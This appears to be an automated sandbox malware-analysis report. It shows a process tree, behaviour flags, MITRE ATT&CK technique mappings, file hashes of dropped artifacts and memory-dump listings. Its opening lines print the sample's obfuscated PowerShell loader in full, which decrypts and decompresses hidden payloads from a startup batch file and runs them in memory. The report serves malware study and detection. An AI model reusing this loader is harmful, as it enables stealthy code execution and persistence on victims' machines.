        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a6/Dz0sQgg0AXxVY9QgYlHPhkoWXKtsBNvv5q5mWBz0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XHnjn+k0TpEqrCKjUcNHHQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpFJb=New-Object System.IO.MemoryStream(,$param_var); $aolNn=New-Object System.IO.MemoryStream; $iXSFF=New-Object System.IO.Compression.GZipStream($HpFJb, [IO.Compression.CompressionMode]::Decompress); $iXSFF.CopyTo($aolNn); $iXSFF.Dispose(); $HpFJb.Dispose(); $aolNn.Dispose(); $aolNn.ToArray();}function execute_function($param_var,$param2_var){ $joNGZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XpYvB=$joNGZ.EntryPoint; $XpYvB.Invoke($null, $param2_var);}$DxRwH = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_282.bat';$host.UI.RawUI.WindowTitle = $DxRwH;$NGRKp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DxRwH).Split([Environment]::NewLine);foreach ($lDbVo in $NGRKp) { if ($lDbVo.StartsWith('aTooeqEeiEcbowJqPEvQ')) { $AbfNn=$lDbVo.Substring(20); break; }}$payloads_var=[string[]]$AbfNn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:4396
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1152
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:3028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
020d1cbef5aeb22088c0faff8d76af4e

SHA1
93e7f27b8fb57cfea4ae330bedcace1a8ce7c014

SHA256
cb283829df7f7ca2f7f8072ed014bebb7d424581e8672a9fa5683f3674726bb0

SHA512
1046228ed9d08e5296c02409b5aa460e8280a633f7f2022ec7dc7c1e750522260006844bd5114ec713593bce1d10b8932963a8630e6707e76b45a0cb8c8ff53d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
3ccf13786554a09feada0ddedbc8a646

SHA1
54d359350816173172d9a351b465207e4be88a8f

SHA256
f436e158dc2fc703547bec5d5111f4a7d43b2b7bb02a16dbab812e48ce8e5ca9

SHA512
6fb3d66ccc739b2a6d93b19af338b3b8cda9c3d431dc9343ccfb7c121fc7f4383aad7581e6e27f9bd482d40b970ab6a61a4365a8003a96b190a9e781b2ae91b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4dylqqap.pqd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_282.vbs

Filesize
124B

MD5
a9de27838e3416cec9787b5b86c108b8

SHA1
33680e876dd185799148c8f74bf83ac3289cbd1b

SHA256
dd4ded0fce54e5e6cc0678adf99121200ff7f4e5318ee33bc88c6b0a3cbbd469

SHA512
579d39b4c623115a6ed366e2114a15923c23f641ef1904610a2c2123f0ca332f8712026adf3430323654f7749ceea8d967cb1a5fb024f71aa0b8a060804e16cc

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
3KB

MD5
4838ee953dab2c7a1bf57e0c6620a79d

SHA1
8c39cd200f9ffa77739ff686036d0449984f1323

SHA256
22c798e00c4793749eac39cfb6ea3dd75112fd4453a3706e839038a64504d45d

SHA512
066782b16e6e580e2861013c530d22d62c5ba0f217428cc0228ad45b855e979a86d2d04f553f3751cf7d063c6863cb7ea9c86807e7f89c7e0ae12481af65af76

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
3KB

MD5
8e64ab95d5d2c4c1e7a757624cb1fffa

SHA1
9889f93ad60bacb07683b4a23c40aa32954646d8

SHA256
dff8902430dcae2fba05fc7f54157c4bc8a7445ed488c1d5727947a0c07075d6

SHA512
3ecc166686c1d7d61e91ec972244118980bf626a88123b87136695ac206e159933ad9f9feb3fd565713dd5d99038f427b845637c51a57497f0ac716de3a7973c

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
3KB

MD5
c6086d02f8ce044f5fa07a98303dc7eb

SHA1
6116247e9d098b276b476c9f4c434f55d469129c

SHA256
8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0

SHA512
1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
3KB

MD5
39b9eb9d1a56bc1792c844c425bd1dec

SHA1
db5a91082fa14eeb6550cbc994d34ebd95341df9

SHA256
acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692

SHA512
255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
4ac1741ceb19f5a983079b2c5f344f5d

SHA1
f1ebd93fbade2e035cd59e970787b8042cdd0f3b

SHA256
7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc

SHA512
583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
a9124c4c97cba8a07a8204fac1696c8e

SHA1
1f27d80280e03762c7b16781608786f5a98ff434

SHA256
8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

SHA512
537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

Download Submit
memory/768-113-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/916-111-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/1152-146-0x0000024E1A500000-0x0000024E1A510000-memory.dmp

Filesize
64KB

Download
memory/1288-101-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/1320-110-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/1700-104-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/1960-106-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/2016-108-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/2096-100-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/2284-103-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/2308-107-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/2444-17-0x00000180B88E0000-0x00000180B8916000-memory.dmp

Filesize
216KB

Download
memory/2444-15-0x00000180B89F0000-0x00000180B8A66000-memory.dmp

Filesize
472KB

Download
memory/2444-6-0x00007FFEB1E70000-0x00007FFEB2932000-memory.dmp

Filesize
10.8MB

Download
memory/2444-11-0x00000180B84E0000-0x00000180B8502000-memory.dmp

Filesize
136KB

Download
memory/2444-12-0x00007FFEB1E70000-0x00007FFEB2932000-memory.dmp

Filesize
10.8MB

Download
memory/2444-49-0x00007FFEB1E70000-0x00007FFEB2932000-memory.dmp

Filesize
10.8MB

Download
memory/2444-13-0x00007FFEB1E70000-0x00007FFEB2932000-memory.dmp

Filesize
10.8MB

Download
memory/2444-19-0x00007FFEB1E70000-0x00007FFEB2932000-memory.dmp

Filesize
10.8MB

Download
memory/2444-14-0x00000180B8920000-0x00000180B8964000-memory.dmp

Filesize
272KB

Download
memory/2444-0-0x00007FFEB1E73000-0x00007FFEB1E75000-memory.dmp

Filesize
8KB

Download
memory/2444-16-0x00000180B88D0000-0x00000180B88D8000-memory.dmp

Filesize
32KB

Download
memory/2780-109-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/2876-112-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/2884-102-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/3020-105-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/3432-99-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download
memory/3588-50-0x0000000007C40000-0x0000000007C6A000-memory.dmp

Filesize
168KB

Download
memory/3588-98-0x00007FFE90C70000-0x00007FFE90C80000-memory.dmp

Filesize
64KB

Download